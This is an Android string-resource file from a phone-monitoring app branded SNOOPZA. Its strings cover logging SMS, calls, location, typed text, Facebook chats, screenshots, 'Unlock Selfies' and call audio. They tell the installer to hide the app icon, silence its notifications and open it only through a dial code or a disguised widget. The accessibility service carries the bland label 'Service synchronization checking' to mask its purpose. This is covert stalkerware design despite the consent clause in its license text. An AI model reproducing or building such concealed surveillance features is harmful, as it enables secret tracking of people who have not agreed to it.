<resources>
    <string name="abc_action_bar_home_description">Navigate home</string>
    <string name="abc_action_bar_up_description">Navigate up</string>
    <string name="abc_action_menu_overflow_description">More options</string>
    <string name="abc_action_mode_done">Done</string>
    <string name="abc_activity_chooser_view_see_all">See all</string>
    <string name="abc_activitychooserview_choose_application">Choose an app</string>
    <string name="abc_capital_off">OFF</string>
    <string name="abc_capital_on">ON</string>
    <string name="abc_font_family_body_1_material">sans-serif</string>
    <string name="abc_font_family_body_2_material">sans-serif-medium</string>
    <string name="abc_font_family_button_material">sans-serif-medium</string>
    <string name="abc_font_family_caption_material">sans-serif</string>
    <string name="abc_font_family_display_1_material">sans-serif</string>
    <string name="abc_font_family_display_2_material">sans-serif</string>
    <string name="abc_font_family_display_3_material">sans-serif</string>
    <string name="abc_font_family_display_4_material">sans-serif-light</string>
    <string name="abc_font_family_headline_material">sans-serif</string>
    <string name="abc_font_family_menu_material">sans-serif</string>
    <string name="abc_font_family_subhead_material">sans-serif</string>
    <string name="abc_font_family_title_material">sans-serif-medium</string>
    <string name="abc_menu_alt_shortcut_label">Alt+</string>
    <string name="abc_menu_ctrl_shortcut_label">Ctrl+</string>
    <string name="abc_menu_delete_shortcut_label">delete</string>
    <string name="abc_menu_enter_shortcut_label">enter</string>
    <string name="abc_menu_function_shortcut_label">Function+</string>
    <string name="abc_menu_meta_shortcut_label">Meta+</string>
    <string name="abc_menu_shift_shortcut_label">Shift+</string>
    <string name="abc_menu_space_shortcut_label">space</string>
    <string name="abc_menu_sym_shortcut_label">Sym+</string>
    <string name="abc_prepend_shortcut_label">Menu+</string>
    <string name="abc_search_hint">Search…</string>
    <string name="abc_searchview_description_clear">Clear query</string>
    <string name="abc_searchview_description_query">Search query</string>
    <string name="abc_searchview_description_search">Search</string>
    <string name="abc_searchview_description_submit">Submit query</string>
    <string name="abc_searchview_description_voice">Voice search</string>
    <string name="abc_shareactionprovider_share_with">Share with</string>
    <string name="abc_shareactionprovider_share_with_application">Share with %s</string>
    <string name="abc_toolbar_collapse_description">Collapse</string>
    <string name="accessibility_service_description">Service synchronization checking</string>
    <string name="app_log_name">Apps</string>
    <string name="appbar_scrolling_view_behavior">com.google.android.material.appbar.AppBarLayout$ScrollingViewBehavior</string>
    <string name="awesome_shape_email"></string>
    <string name="awesome_shape_eye"></string>
    <string name="awesome_shape_link"></string>
    <string name="awesome_shape_lock"></string>
    <string name="bottom_sheet_behavior">com.google.android.material.bottomsheet.BottomSheetBehavior</string>
    <string name="character_counter_content_description">Character limit exceeded %1$d of %2$d</string>
    <string name="character_counter_pattern">%1$d / %2$d</string>
    <string name="check">Uninstall old version here</string>
    <string name="chrome_search_text">Search or type web address</string>
    <string name="date_format_full">d MMM yyyy</string>
    <string name="date_format_point">dd.MM.yyyy</string>
    <string name="date_format_short">d MMM</string>
    <string name="dialog_allow_unknown_source">To update the app, allow “Install unknown apps”.</string>
    <string name="dialog_battery_optim">Please switch off Optimize battery usage for app to work correctly</string>
    <string name="dialog_battery_optim_on">Optimize battery usage is still enabled!</string>
    <string name="dialog_battery_optim_set">":
 - Change \"Not optimized\" to \"All apps\" item
 - Find and turn off \"%1$s\" app
 - Tap \"Back\" button"</string>
    <string name="dialog_no">No</string>
    <string name="dialog_ok">OK</string>
    <string name="dialog_perm_accessibility">Please enable app accessibility service</string>
    <string name="dialog_perm_accessibility_on">App accessibility service is still disabled!</string>
    <string name="dialog_perm_app">"Please activate all app permissions:
 - Open \"Permissions\" item
 - Activate all permissions"</string>
    <string name="dialog_perm_app_off">Some app permissions are still disabled!</string>
    <string name="dialog_perm_notif">Please disable app notifications</string>
    <string name="dialog_perm_notif_on">App notifications are still enabled!</string>
    <string name="dialog_perm_overlay">Please activate \"Appear on top\" permission to get Screenshots and Unlock Selfies</string>
    <string name="dialog_perm_overlay_off">\"Appear on top\" permission is still disabled!</string>
    <string name="dialog_perm_read_notif">Please allow %1$s to read notifications</string>
    <string name="dialog_perm_read_notif_off">Access to read notifications is still disabled!</string>
    <string name="dialog_perm_scr">"Please allow %1$s to capture screen to get screenshots:
 - Enable \"Don't show again\" item
 - Tap \"Start now\" button"</string>
    <string name="dialog_perm_scr_off">Screen capturing is still disabled!</string>
    <string name="dialog_perm_usage">"Please activate \"Usage data access\" permission to get screenshots:
 - Find and tap \"%1$s\" app
 - Enable Usage access
 - Tap \"Back\" button twice"</string>
    <string name="dialog_perm_usage_off">\"Usage data access\" permission is still disabled!</string>
    <string name="dialog_pin_current">Current PIN</string>
    <string name="dialog_pin_retype">Retype PIN</string>
    <string name="dialog_pin_specify">New PIN</string>
    <string name="dialog_run_app">To open hidden app dial:</string>
    <string name="dialog_run_app_sticker">To open hidden app use \"Sticker\" widget</string>
    <string name="dialog_src0">DEFAULT</string>
    <string name="dialog_src1">MIC</string>
    <string name="dialog_src2">VOICE_UPLINK</string>
    <string name="dialog_src3">VOICE_DOWNLINK</string>
    <string name="dialog_src4">VOICE_CALL</string>
    <string name="dialog_src5">CAMCORDER</string>
    <string name="dialog_src6">VOICE_RECOGNITION</string>
    <string name="dialog_src7">VOICE_COMMUNICATION</string>
    <string name="dialog_src8">REMOTE_SUBMIX</string>
    <string name="dialog_src9">UNPROCESSED</string>
    <string name="dialog_uninstall_ask">Do you want to uninstall Monitor?</string>
    <string name="dialog_update">Update</string>
    <string name="dialog_wait">Please Wait…</string>
    <string name="dialog_yes">Yes</string>
    <string name="email_msg_alarm">Subscription expires after %1$s.</string>
    <string name="email_msg_alarm_renew">"
Please renew your subscription."</string>
    <string name="email_msg_alarm_stop">Subscription has expired.</string>
    <string name="email_msg_alarm_stop_logs">Paid reports will be discarded unless you start a subscription.</string>
    <string name="event_count">Count</string>
    <string name="event_name">Event</string>
    <string name="fab_transformation_scrim_behavior">com.google.android.material.transformation.FabTransformationScrimBehavior</string>
    <string name="fab_transformation_sheet_behavior">com.google.android.material.transformation.FabTransformationSheetBehavior</string>
    <string name="facebook_active">active</string>
    <string name="facebook_add_your_story">Your Story</string>
    <string name="facebook_call">Call with</string>
    <string name="facebook_chat_head_with">"Chat head with "</string>
    <string name="facebook_datetime_format">"MMM d 'AT' h:mm a"</string>
    <string name="facebook_datetime_format24">"MMM d 'AT' HH:mm"</string>
    <string name="facebook_friends">on Facebook</string>
    <string name="facebook_full_datetime_format">"MMM d, yyyy 'AT' h:mm a"</string>
    <string name="facebook_full_datetime_format24">"MMM d, yyyy 'AT' HH:mm"</string>
    <string name="facebook_goto_last_msg">Jump to latest message</string>
    <string name="facebook_open_profile">Open Profile Menu</string>
    <string name="facebook_thread_details">Thread details</string>
    <string name="facebook_time_ago">ago</string>
    <string name="facebook_time_now">now</string>
    <string name="facebook_unread">Unread</string>
    <string name="facebook_weekdaytime_format">"EEE 'AT' h:mm a"</string>
    <string name="facebook_weekdaytime_format24">"EEE 'AT' HH:mm"</string>
    <string name="facebook_you">You:</string>
    <string name="firefox_search_text">Search or enter address</string>
    <string name="general_password">Please Enter Your PIN</string>
    <string name="img_empty_description" />
    <string name="img_logo_caption">SNOOPZA</string>
    <string name="inst_hello_cancel">Cancel Installation</string>
    <string name="inst_license_caption">End User License Agreement</string>
    <string name="inst_log_select_all">All activities</string>
    <string name="inst_log_select_apps">Apps</string>
    <string name="inst_log_select_calendar">Calendar</string>
    <string name="inst_log_select_calls">Call logs</string>
    <string name="inst_log_select_caption">Device Activities to Track</string>
    <string name="inst_log_select_contacts">Contacts</string>
    <string name="inst_log_select_gallery">Gallery</string>
    <string name="inst_log_select_hint">"If you leave some options unchecked you won't be able to turn them on remotely. You would need physical access to a device."</string>
    <string name="inst_log_select_location">Location</string>
    <string name="inst_log_select_sms">SMS/MMS</string>
    <string name="inst_log_select_system">System events</string>
    <string name="inst_log_select_system_hint">(SIM, battery, networks info)</string>
    <string name="inst_log_select_unlock">Unlock photos</string>
    <string name="inst_log_typed_text">Typed text</string>
    <string name="license_accept">I accept</string>
    <string name="license_read">I have read and understood the terms</string>
    <string name="license_text"><b>1.</b>" You are aware that this software can record, store and transmit information about device usage and its user activity. 
 
"<b>2.</b>" You are allowed to use this software only under the following conditions: 
You are using this software on a device that you own and personally use; 
You have explicit written consent of the owner and all users of the device to be monitored; 
You are a legal guardian of the user of the device to be monitored; 
 
"<b>3.</b> You know and comply with the laws and regulations that cover privacy, confidentiality and the use of such monitoring software in your jurisdiction. You assume full responsibility for installing or using the software. Developers, sellers or distributors of the software cannot be held responsible for any legal violations or consequences that result from you installing or using the software.</string>
    <string name="menu_change_email">Change email settings</string>
    <string name="menu_change_pin">Change app PIN</string>
    <string name="menu_check_app_state">Check app permissions</string>
    <string name="menu_check_update">Check for updates</string>
    <string name="menu_close">Close</string>
    <string name="menu_enable_pin_protection">Enable PIN protection</string>
    <string name="menu_hide_icon">Hide %1$s icon</string>
    <string name="menu_reset_app_perm">Reset app permissions</string>
    <string name="menu_select_source">Change audio source</string>
    <string name="menu_uninstall">Uninstall</string>
    <string name="next">next</string>
</resources>